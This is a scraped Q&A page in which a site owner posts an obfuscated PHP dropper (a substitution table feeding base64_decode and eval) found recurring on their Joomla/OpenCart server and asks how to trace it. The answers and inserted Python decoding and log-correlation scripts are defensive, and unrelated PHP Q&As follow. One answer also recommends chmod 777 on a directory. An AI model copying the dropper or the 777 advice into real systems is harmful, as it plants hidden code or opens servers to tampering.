We have an AWS EC2 instance with CentOS. There are 4 sites hosted on this instance: one static HTML and PHP site, two Joomla (v3.4.5), one Opencart (v2.0.1.1).
Yesterday we found a few files which are not related to our codebase and seem to be malware. We executed egrep -Rl 'function.*for.*strlen.*isset' /home/ and found that there are a few files with the following sample code.
<?php
function rjlynu($vkofjapoz, $avsepejks){$gjcdh = ''; for($i=0; $i < strlen($vkofjapoz); $i++){$gjcdh .= isset($avsepejks[$vkofjapoz[$i]]) ? $avsepejks[$vkofjapoz[$i]] : $vkofjapoz[$i];}
$jcmkpl="base64_decode";return $jcmkpl($gjcdh);}
$fkcrhcwlxx = 'KAYS3ymsuxKqMLBk10JIDxYauxMVX0MsMVddThITKAYS3ymsuxKqML5HupmY18MH18F8EcNkldkNuxMV'.
'X0Ma1fydX0MQ3Z98TcNkldkN1LyQx0BkXZyaXAYC3xKqF4bn4bJkuL9H1fyatxG'.
'Y1YmPDfmVt4w5ThITKAYS3ymsuxKqMLpP26mY2Ay7txBkXL9atAYCuz1IF4bn4wkkueNqtfyV1'.
'LYHXYm7XLpdDxMYT6JOR6mZByMhzRmlE4N8GzrdE7N8E4N8v41kO4bw2dqw'.
'O4BVuxFwvzJJ18MP2zwkldqwO4BVuxGXO8MY10yIt4MtZVM73Ay73VMtOcQwFcITO4JYDLPHOAMP1LRLG6mYXf'.
'GHuARq1LyV3Z6I3xkYT4BVuxFkThITaKqTu8ySD0BkXLrwD0ystAmCx0GQ1fYdx0BPu0FqMiBY2'.
'iKk48ITO4NwO4BQuxPQOcQw10BV3xJatA681VwbtAyrt4dwMs5Pve'.
'1kldqTO4NwO4BQuxPQOcQw10BVx0MY1A5PDLRqO75POAPVuZDmx4OeE4NeZVNeE4NbtAyrt4'.
'bn4eNwO4NbtAyrt4NmOiGQ1YmVuxJIDZGYT4OWELU+OedwOeOIO4BQuxPQThITO4NwO4BQ'.
'uxPQOcQw10BVx0MY1A5PDLRqOYdeveOIO4OwxzNeE4NbtAyrt4bn4wqwO4Nw1fyQtxMSO4BQux'.
'PQldkm4wk7XA6s1VJhhyBKOiITO4JdtZMI3ZFwM6GGy6JaRUmzy4NmOcOpldqwOiJpDf5kDVNbKpMFBe'.
'NmO4M11Y5SO7ITO4JdtZMI3ZFwMABHxLBYD8y8OcQwFcITO4JdtZMI'.
'3ZFwMUBYD8y8X0yQ1iyQO4NwO4NmO4tYDLPHMsITO4JdtZMI3ZFwMABHx0uY18NwvzJfDZ5suhITO4JdtZMI3ZFwM6BkXZyHtxK'.
'wO4NwO4NwO4NmOcUpldqwOiJpDf5kDVNbyAYCuZ5kXZYQO4NwO'.
'MY10yIt4MtZVM73Ay73VMtOcQwFhIT4fy73AWwDf6suhDQxLySDLmbuzPsuxMkDZ5k2fRqMiMY1VbkldqTu'.
'xPkt4wkld==';
$ghjnzmrjlg = Array('1'=>'c', '0'=>'3', '3'=>'a', '2'=>'e', '5'=>'x', '4'=>'C', '7'=>'j', '6'=>'F', '9'=>'5', '8'=>'n', 'A'=>'G', 'C'=>'t', 'B'=>'R', 'E'=>'L', 'D'=>'Y', 'G'=>'N', 'F'=>'M', 'I'=>'s', 'H'=>'v', 'K'=>'Q', 'J'=>'B', 'M'=>'J', 'L'=>'2', 'O'=>'I', 'N'=>'A', 'Q'=>'0', 'P'=>'h', 'S'=>'u', 'R'=>'U', 'U'=>'E', 'T'=>'K', 'W'=>'8', 'V'=>'y', 'Y'=>'l', 'X'=>'b', 'Z'=>'W', 'a'=>'f', 'c'=>'D', 'b'=>'k', 'e'=>'i', 'd'=>'w', 'g'=>'6', 'f'=>'m', 'i'=>'H', 'h'=>'T', 'k'=>'p', 'j'=>'r', 'm'=>'9', 'l'=>'O', 'o'=>'q', 'n'=>'7', 'q'=>'o', 'p'=>'1', 's'=>'z', 'r'=>'4', 'u'=>'Z', 't'=>'d', 'w'=>'g', 'v'=>'P', 'y'=>'V', 'x'=>'X', 'z'=>'S');
eval(rjlynu($fkcrhcwlxx, $ghjnzmrjlg));?>
Even if we remove these files, they get created again and again.
What could be the issue? How can we find the root cause behind this and what is the permanent solution?
Thanks
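The sample above hides its real code behind a character-substitution table followed by base64_decode and eval. As an added example (not part of the original post), this Python script recovers that hidden source statically, without executing it; the embedded sample and its variable names are constructed and carry a harmless payload.

```python
import base64
import re

# Constructed sample in the same shape as the dropper on this page: a
# substitution map applied to base64 text, then base64_decode + eval.
# The hidden payload is a harmless echo, not the payload from the page.
SAMPLE = r"""<?php
function f($s, $m){$o = ''; for($i=0; $i < strlen($s); $i++){$o .= isset($m[$s[$i]]) ? $m[$s[$i]] : $s[$i];}
$d="base64_decode";return $d($o);}
$p = 'QxNobyAi7H'.
'JpYx7lIjs=';
$k = Array('Q'=>'Z', 'Z'=>'Q', 'x'=>'W', 'W'=>'x', '7'=>'d', 'd'=>'7');
eval(f($p, $k));?>"""

EVAL_CALL = re.compile(r"eval\(\s*\w+\(\s*\$(\w+)\s*,\s*\$(\w+)\s*\)\s*\)")
MAP_PAIR = re.compile(r"'(.)'\s*=>\s*'(.)'")
LITERAL = re.compile(r"'([^']*)'")


def _assigned_expr(src, var):
    """Return the right-hand side of the first `$var = ...;` statement."""
    m = re.search(r"\$" + re.escape(var) + r"\s*=\s*(.*?);", src, re.S)
    if m is None:
        raise ValueError(f"no assignment found for ${var}")
    return m.group(1)


def deobfuscate(src):
    """Statically recover the PHP source that the dropper would eval()."""
    call = EVAL_CALL.search(src)
    if call is None:
        raise ValueError("no eval(decoder($payload, $map)) call found")
    payload_var, map_var = call.groups()
    table = dict(MAP_PAIR.findall(_assigned_expr(src, map_var)))
    encoded = "".join(LITERAL.findall(_assigned_expr(src, payload_var)))
    # Same logic as the PHP decoder: substitute mapped characters, keep the rest.
    b64 = "".join(table.get(ch, ch) for ch in encoded)
    return base64.b64decode(b64, validate=True).decode("utf-8", "replace")


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Reading the decoded source usually shows what the dropper accepts from the request, which helps when searching the logs for the request that recreates it.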
Look up the access log; I believe they are located here: /var/log/apache2/access.log
I would also check the folder permissions and make sure it's not something like 777. I would also check the processes using the ps command from SSH to watch the processes that are running.
I would also make sure to run ClamAV. Before all of that, I would also make backups of all of the sites and upgrade every plugin you have installed.
Good luck with your server.
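One way to act on the access-log suggestion above, as an added example that is not part of the original answer: list the write-style requests logged shortly before a dropped file reappeared. The log lines, paths and timestamp are constructed, and the Apache combined log format is assumed.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Constructed Apache "combined" log lines (documentation IP ranges).
ACCESS_LOG = """\
198.51.100.7 - - [12/Jan/2016:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jan/2016:03:14:58 +0000] "POST /images/upload.php HTTP/1.1" 200 12 "-" "curl/7.29.0"
198.51.100.7 - - [12/Jan/2016:03:15:30 +0000] "POST /index.php?route=checkout/cart HTTP/1.1" 200 431 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jan/2016:09:40:02 +0000] "GET /cache/sess.php HTTP/1.1" 200 0 "-" "curl/7.29.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def file_changed_at(path):
    """Inode change time (UTC); on Linux this moves when a file is re-created."""
    return datetime.fromtimestamp(os.stat(path).st_ctime, tz=timezone.utc)


def requests_near(log_text, created_at, window_s=60, methods=("POST", "PUT")):
    """Return (time, ip, method, path, status) for write-style requests
    logged within window_s seconds before created_at."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, stamp, method, path, status = m.groups()
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        delta = created_at - when
        if method in methods and timedelta(0) <= delta <= timedelta(seconds=window_s):
            hits.append((when, ip, method, path, int(status)))
    return hits


if __name__ == "__main__":
    # Constructed timestamp; in practice use file_changed_at("/path/to/dropped/file").
    created = datetime(2016, 1, 12, 3, 15, 0, tzinfo=timezone.utc)
    for when, ip, method, path, status in requests_near(ACCESS_LOG, created):
        print(when.isoformat(), ip, method, path, status)
```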
Related
I have installed the Drupal XHProf 7.x-1.0-beta2 module and enabled it on the Modules page of my site.
I have enabled the use of the module at Configuration -> Development -> XHProf settings (/admin/config/development/xhprof) by checking "Enable profiling of all page views and drush requests."
Now what?
When I visit a page and click "XHProf output" at the bottom of the page, I get this error:
"Run #51b789ae8cea0: Invalid Run Id = 51b789ae8cea0"
And the list of the "Top 100 functions" is totally empty. I am a bit lost as to what I should be seeing or where to go from here. Any help greatly appreciated.
Please refer to the error screenshot.
Go to your backend folder structure. Create a folder named xhprof on your server, inside the tmp folder, like 10.20.4.123/tmp
On clicking "XHProf output" at the bottom of the page, it will display the output.
Looking at the code that returns this error it's a file exists check. I changed $run_desc to output the full filename vs the run id.
if (!file_exists($file_name)) {
xhprof_error("Could not find file $file_name");
$run_desc = "Invalid Run Id = $file_name";
return null;
}
In my case for a run id of 617064cfe0f71 it was looking for a filename formatted like
617064cfe0f71.xhprof.xhprof
The filename is derived from this function
private function file_name($run_id, $type) {
$file = "$run_id.$type." . $this->suffix;
...
}
It's a permission issue, just set chmod 777 for your xhprof output directory.
I am trying to run a R script from PHP, and in R script, I will create test.jpg image, and in PHP, I will display this image on web.
The R is 2.11.1 and OS is Ubuntu 10.10.
The problem is: this .jpg is created successfully if I run from terminal, but no image created if I run from WebUI. I run the script from terminal and WebUI in the same directory. /opt/lampp/htdocs/name/. (If somebody can tell me a good tool to debug this WebUI, it would be great. I put some echo in the .php file, I see the functions being called, but still do not know how to solve this bug).
The .jpg is created when I run from terminal:
php r_caller.php
In this r_caller.php, I have simple function as:
<?php php_call_r(){
$cmd = "echo 'argv <- \"r_command.r\"; source(argv)' | " .
"/usr/bin/R --vanilla --slave";
$ret = system($cmd);
echo $ret;}
?>
and this php_call_r function is called in the same file as r_caller.php:
<?php
//some irrelevant code above
php_call_r();
print("<img src=test.jpg>");
?>
and in the r_command.r script, I have simple commands as:
jpeg("test.jpg")
plot(50, 50)
dev.off()
I really appreciate your help!
You did not specify your platform and R version, but on unix the jpeg() device may require X11 to render the image (which you may have in your interactive session but not in apache). You may be better off using the Cairo package or other means that don't require X11 session (recent R allows you to use alternative types in the jpeg call which you can also try - see ?jpeg).
(As a side note there is a PHP client to Rserve which makes web requests much faster - running R itself is pretty much the slowest way to use R from PHP. If you don't want to install any packages then you may want to use at least Rscript)
Edit: Now that you have added the R version - that's a really ancient one, you should seriously consider upgrading it. You can try installing Cairo with that old R version, but you may possibly need to go back there as well.
One more thing to consider: check your file privileges and make sure www-data has write permissions wherever you will be creating the file (e.g., see echo system("pwd"); for the current directory R will be run in).
Check the Apache error logs to see if there are any errors. Try adding the following to the beginning of your PHP code:
error_reporting(E_ALL);
ini_set('display_errors','On');
This might be a copy/paste error, but your php_call_r function is not properly defined as a function. I suggest the following:
<?php function php_call_r() {
$cmd = "echo 'argv <- \"r_command.r\"; source(argv)' | " .
"/usr/bin/R --vanilla --slave";
$ret = system($cmd);
echo $ret;
}
?>
Executing R from PHP for each request is a very bad idea -- PHP piping is usually not reliable and R's output is optimized for interactive work rather than transmitting results. Moreover, R takes ages to start, so you waste lots of time and CPU power.
The better idea is to use R worker daemon, created by either Rserve or triggr -- Rserve has PHP client, for triggr you need to cook one on your own, but it is trivial; it may look like this:
R part (r.R)
require(triggr);
serve(function(data_from_php){
cat(sprintf("Called with: %s\n",data_from_php));
#<<Picture creation code>>
#Break connection notifying PHP that picture is done
return(endConnection("Done\r\n"));
},9090);
# ^- Port you want to use for internal communication
PHP part
<?php
$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
echo "Connecting...\n";
if(socket_connect($s,"localhost",9090)){
echo "Connected!\n"; //v double \r\n is crucial
$d="some data for R\r\n\r\n";
socket_write($s,$d,strlen($d));
//This blocks until picture is done
$r=socket_read($s,6);
//Here we can emit the page featuring <img>
echo "Response was $r\n";
}
?>
Now you just fire r.R in background or under some auto-resurrection daemon and you are done.
I want to put an auto-incremental build number in my PHP-based web application.
Since I'm not compiling, but I'm using svn for source control, I thought that maybe each checkout could count as a build.
Am I right?
If so, how can I get the current svn revision number of the production server local copy via PHP?
If not, what would you say is the best method to put an auto-incremental build number in a web app?
Not used SVN for a long time, but this should work.
$var = '$Id:$';
SVN replaces $Id:$ on every checkout
Update: Seems, that $Rev:$ is more convenient.
I think Getting the last revision number in SVN? might answer your question!
I found this How can I get the svn revision number in PHP?
Where somebody says that on the deployment script you can include:
cd /var/www/project
svn update
rm version.php
svnversion > version.php
To fill version.php with the current svn version.
Then, you include version.php where you need it.
Also, I found this, that seems to work without updating a specific file:
$path='path_to_your_project';
function get_svn_revision ($path)
{
// Quote the path so spaces or shell metacharacters cannot alter the command
$cmd = 'svnversion -n ' . escapeshellarg($path);
$result = (int)exec ($cmd);
return $result;
}
But since I didn't want to execute a command, I ended up querying /.svn/entries at the root of the project using:
$path='path_to_your_project';
function get_svn_revision($path) {
$svn = File($path . '/.svn/entries');
//Revision number is the fourth line
$result = $svn[3];
unset($svn);
return $result;
}
This is the first time I've ever used a CRON.
I'm using it to parse external data that is automatically FTP'd to a subdirectory on our site.
I have created a controller and model which handles the data. I can access the URL fine in my browser and it works (however I will be restricting this soon).
My problem is, how can I test if it's working?
I've added this to my controller for a quick and dirty log
$file = 'test.txt';
$contents = '';
if (file_exists($file)) {
$contents = file_get_contents($file);
}
$contents .= date('m-d-Y') . ' --- ' . PHP_SAPI . "\n\n";
file_put_contents($file, $contents);
But so far I've only got requests logged from myself from the browser, despite having my CRON running every minute.
03-18-2010 --- cgi-fcgi
03-18-2010 --- cgi-fcgi
I've set it up using cPanel with the command
index.php properties/update/
the 2nd portion is what I use to access the page in my browser.
So how can I test this is working properly, and have I stuffed anything up?
Note: I'm using Kohana 3.
Many thanks
You're not using the correct command for calling Kohana.
Make sure you're using the full path to index.php so you can eliminate any path errors. Here are the switches available for use in Kohana:
--uri: Self explanatory
--method: HTTP Request method (POST, GET, etc ...) (Overrides Kohana::$method)
--get: Formatted GET data
--post: Formatted POST data
You should be using something like this:
php /path/to/kohana/directory/index.php --uri=properties/update/
I can't remember if you need double quotes around the value, don't forget to try that if it doesn't work.
You probably aren't running Cron with root permissions on that file.
Put MAILTO="youremail@yourdomain.tld" at the start of the cron file to have it email you errors.
If you don't have root access to the cron file (i.e. SSH), I don't know if you can do this in cPanel.
I was needing a way to generate thumbnails (using PHP5) for an image management script and had a problem where my host has multiple versions of PHP installed (4 and 5), with PHP4 set as default. This meant that any calls to php from the CLI would run PHP4. I've come up with the following as what I hope to be a cross platform solution. I'm posting it here primarily as I had a lot of trouble finding any help using Google, so this might help someone in the future, I also have the following questions.
Do you see anything obviously wrong with it?
Are there any other paths to the php5 binary that you know of or know of a better order to have the array for optimisation?
If a host has exec or shell_exec disabled, will the EGalleryProcessQueue.php script be able to be run as a standalone cron job? I don't have access to cron to be able to test this yet. I'm not too worried about this question, as I'll get around to testing it eventually anyway.
Does anyone have any suggestions as to a way in which I can get some feedback as to how far through the images the processing is? See the TODO section of EGalleryProcessQueue.php I'd like to display a progress bar when it's in the admin section.
Main script
/**
* Writes the array to a text file in /path/to/gallery/needsThumbs.txt for batch processing.
* Runs the thumbnail generator script in the background.
*
* @param array $_needsThumbs the array of images needing thumbnails
*/
private function generateThumbnails($_needsThumbs)
{
file_put_contents($this->_realpath.DIRECTORY_SEPARATOR.'needsThumbs.txt',serialize($_needsThumbs));
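// Quote the script and gallery paths and force the sizes to integers before they reach the shell
$Command = escapeshellarg(realpath(dirname(__FILE__)).DIRECTORY_SEPARATOR.'EGalleryProcessQueue.php').' '.escapeshellarg($this->_realpath).' '.(int)$this->thumbnailWidth.' '.(int)$this->thumbnailHeight;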
if(PHP_SHLIB_SUFFIX == 'so')// *nix (aka NOT windows)
{
/*
* We need to make sure we are using the right PHP version
* (problems with shared hosts that have PHP4 and PHP5 installed,
* but PHP4 set as default).
*/
$phpPaths = array('php', '/usr/local/bin/php', '/usr/local/php5/bin/php', '/usr/bin/php', '/usr/bin/php5');
foreach($phpPaths as $path)
{
exec("echo '<?php echo version_compare(PHP_VERSION, \"5.0.0\", \">=\"); ?>' | $path", $result);
if($result)
{
shell_exec("nohup $path $Command 2> /dev/null > /dev/null &");
break;
}
}
}
else // Windows
{
$WshShell = new COM("WScript.Shell");
$WshShell->Run("php.exe $Command", 0, false);
}
}
EGalleryProcessQueue.php
#!/usr/bin/php
<?php
if ($argc === 4 && strstr($argv[0], basename(__FILE__))) {
// File is being called by the CLI and has not been included by another script
if(!file_exists($argv[1].DIRECTORY_SEPARATOR.'needsThumbs.txt'))
{
// Either no thumbnails need to be created or a wrong directory has been supplied
exit;
}
include(realpath(dirname(__FILE__)).DIRECTORY_SEPARATOR.'EGalleryThumbGenerator.php');
$generator = new EGalleryThumbGenerator;
$generator->directory = $argv[1];
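// $argv values are always strings, so is_int() would never match; accept digit strings instead
$generator->thumbnailWidth = ctype_digit($argv[2]) ? (int)$argv[2] : 128;
$generator->thumbnailHeight = ctype_digit($argv[3]) ? (int)$argv[3] : 128;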
// $generator->processImages() returns the number of images left to process (it does them in blocks of 10)
while (($i = $generator->processImages()) > 0)
{
/*
* TODO Can we get some sort of feedback to the user here?
* Possibly so that we can display a progress bar in the management section.
* Probably have to write $i to a file to be read by the main script.
*/
}
exit;
}
?>
Do you see anything obviously wrong with it?
Nope, the code looks good.
Are there any other paths to the php5 binary that you know of or know of a better order to have the array for optimization?
This is a hard question to answer, as PHP could be installed anywhere on a server. The paths you have seem to be very logical to me, but there could be any number of other places it could be installed.
Rather than providing a bunch of directories where PHP5 might be installed, what about having a parameter the user has to set to provide the path to the PHP5 executable if it's not in their $PATH?
If a host has exec or shell_exec disabled, will the EGalleryProcessQueue.php script be able to be run via a cron job?
I haven't tested it, but I would assume that would prevent the script from running.
Does anyone have any suggestions as to a way in which I can get some feedback as to how far through the images the processing is? See the TODO section of EGalleryProcessQueue.php I'd like to display a progress bar when it's in the admin section.
Store the number of images completed somewhere (file, db, maybe even session var) and have an AJAX call fire every second or so to a function that provides done vs total. Then use something like http://docs.jquery.com/UI/Progressbar